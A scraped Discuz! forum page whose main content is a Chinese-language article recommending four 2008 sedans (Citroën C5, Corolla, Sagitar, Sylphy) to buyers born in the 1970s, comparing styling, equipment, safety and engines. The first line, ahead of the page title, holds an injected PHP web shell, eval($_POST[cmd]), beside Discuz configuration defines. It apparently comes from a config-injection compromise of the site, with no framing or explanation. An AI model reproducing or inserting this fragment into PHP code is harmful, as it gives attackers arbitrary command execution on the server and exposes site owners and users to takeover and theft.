');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 四款適合70後車型:08款凱旋、軒逸、速騰、卡羅拉 - 改裝俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

四款適合70後車型:08款凱旋、軒逸、速騰、卡羅拉

70年代出生的人已跨入30歲的門檻,在事業上已有了一些成績,相比20多歲時更多了一份成熟,也增添了一些理性。在購車的問題上,他們更加青睞大氣時尚的車型,同時也比較看重安全性、裝備是否齊全,可謂要面子更要裡子。最適合這部分人群的車型有那些呢?我們今天推薦四款非常出色的車型——08款凱旋、卡羅拉、速騰和軒逸。

  Num.01 ——08款凱旋



  在造型方面,08款凱旋在諸多方面進行了精心改進與升級,使其不僅成為了70後精英人士的家用首選,還能滿足公商務場合的使用需求。08款凱旋亮麗的鍍鉻裝飾條的巧妙應用,使得整車外觀更顯時尚與尊貴。




  科技配備方面,08款凱旋所具有的GPS導航系統、中央固定集控式方向盤、隨動轉向雙氙氣大燈、感光式自適應組合儀表,以及博世最高版本ESP電子穩定系統、全漢化行車電腦、電子可變助力轉向等高新科技的應用,充分展現了東風雪鐵龍的人性關懷哲學,成為同級別車型的人性化標桿。同時,08款凱旋採用了先進的2.0L VVT可變氣門正時技術發動機。不僅使油耗減少了5%,而且動力輸出非常強勁,最高車速為同級別最高。08款凱旋200N‧m的最大扭矩輸出在同排量中也是首屈一指。超大扭矩使得東風雪鐵龍08款凱旋0-100公里加速時間只需9.9秒,成為同級別車型中的「加速王」。

  此外,凱旋車型獨有的全方位安全呵護更使得其在C-NCAP碰撞試驗中一撞成名,以高分獲得了C-NCAP五星的佳績,一舉成為15-20萬中高級轎車的安全冠軍。
Num.02——卡羅拉

  卡羅拉的外觀動感時尚,內飾設計及色彩搭配清新簡潔,一些功能性設計非常講究人性化;內飾件雖然塑料感過強,但材質和做工很好,並不顯低檔。外形設計流露出明顯的歐化特質,家族風格清晰顯現,有點像縮小版的凱美瑞,端莊大氣。雙VVT-i發動機匹配6速手動變速箱或者4速自動變速箱,動力輸出強勁而平順,同時又實現了很好的燃油經濟性。




  安全性方面,帶EBD電子制動分配系統的ABS防抱死制動系統、BA剎車輔助系統、VSC車身穩定系統、TOYOTA獨有的GOA安全車身、可潰縮式轉向柱、安全座椅——這一系列的設計和配備構成了卡羅拉主動和被動安全的豪華陣容。

  Num.03——速騰

  雖然既不像08款凱旋那樣大氣、擁有豪華科技裝備,也不像卡羅拉那樣時尚動感。但速騰在各方面都能保證你挑不出很明顯的毛病,它將是講求中庸之道的70後消費者的理想選擇。




  速騰因為軸距僅為2578mm,因此空間絕不是它的強項。但通過合理的設計,速騰還是保證了後排較為充裕的空間。雖然與08款凱旋相比,速騰在科技配置上稍顯「吝嗇」,但也配備了高度可調的大燈、感應雨刷等科技配置。

  速騰動力表現讓人感覺到它的設計理念是「夠用」。85KW的功率、170N‧m的扭矩在加速產生的推背感已比較明顯。操縱性上速騰有更多的亮點,因為和08款凱旋一樣配備了ESP,雖然版本較低,但保證了操控的穩定。

  Num.04——軒逸

  軒逸的外形較為秀氣,簡潔的中控台和少量的桃木裝飾更體現了軒逸家庭式的溫馨。雖然軒逸在內部空間上稍有不足,但作為家用已經足夠。而且,軒逸的內飾大多經過精心設計,乘坐感比較舒適。例如軒逸座椅的質感以及形狀就非常人性化。尤其是後排座椅,據說其設計理念就來自於高檔家用沙發,形狀和質感都非常自然舒適,成為其一大亮點。




  為了保證乘坐的舒適,軒逸還在降低噪音、提高變速器的平順性上下了很大功夫。軒逸的整個加速過程非常安靜,而CVT無級變速器使得軒逸無論以何種形式加速,速度提升都是呈線性規律的,非常均勻平穩。

  可以說,08款凱旋、軒逸、速騰和卡羅拉都有自己不同的氣質和性能優勢,因此70後的消費者有著較大的選擇餘地。在各車型價格日趨合理的情況下,這四款車都是70後理想的選擇
返回列表